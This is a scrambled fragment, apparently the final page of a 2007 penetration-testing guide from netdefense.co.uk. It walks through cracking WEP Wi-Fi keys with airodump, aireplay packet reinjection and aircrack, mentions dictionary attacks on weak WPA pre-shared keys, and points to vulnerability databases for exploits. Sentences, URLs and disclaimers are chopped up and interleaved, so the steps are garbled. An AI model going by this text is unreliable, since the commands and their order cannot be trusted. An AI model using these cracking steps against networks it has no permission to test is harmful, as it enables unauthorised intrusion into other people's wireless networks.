Cisco. Checkpoint. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.Penetration Testing Security Audits and Assessments http://www.uk Configure your WLAN card ifconfig eth0 up iwconfig eth0 mode monitor airodump eth0 tocrack New window: cd wepcrack aireplay -i eth0 look for packet where BSSID MAC must match AP (Target) DO NOT LOOK for packets with DST FF:FF:FF:FF:FF:FF Choose “No” to all other packets and choose “Yes” when the presented packet matches the BSSID MAC of the AP This ARP packet will now be used to re-inject WEP=1 Once you have around 500 000 IVs captured click stop.co. WPA Wifi Protected Access is a newer 801.co.netdefense.co. sponsored by or affiliated with any of the vendors mentioned. New window cd wepcrack aircrack -q 3 -f 2 tocrack.remote-exploit. Netdefense.co. Microsoft.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.1x based security feature for Wireless LANs but is vulnerable to dictionary attacks if weak Pre-Shared keys are used.uk – All rights reserved. http://www. © 2007 netdefense. Google and all other companies mentioned are all owners of their respective trademarks and Logos.org Exploits Once you obtained the server’s version. This material is for study and education purposes only and netdefense.cap DONE Once you have the key.uk is not responsible for the content of external links and cannot assure that all of them work. . It cracks weak passwords by using hashed values of dictionary words.co. Solaris. WPACrack is a tool available with the Auditor Security CD. Search for alternatives on Google in case of a broken link.uk info@netdefense. search for exploits in vulnerability databases (See Tools & Links section) Page 22 of 22 This material is not endorsed by. associate with the AP using this key.

Sign up to vote on this title
UsefulNot useful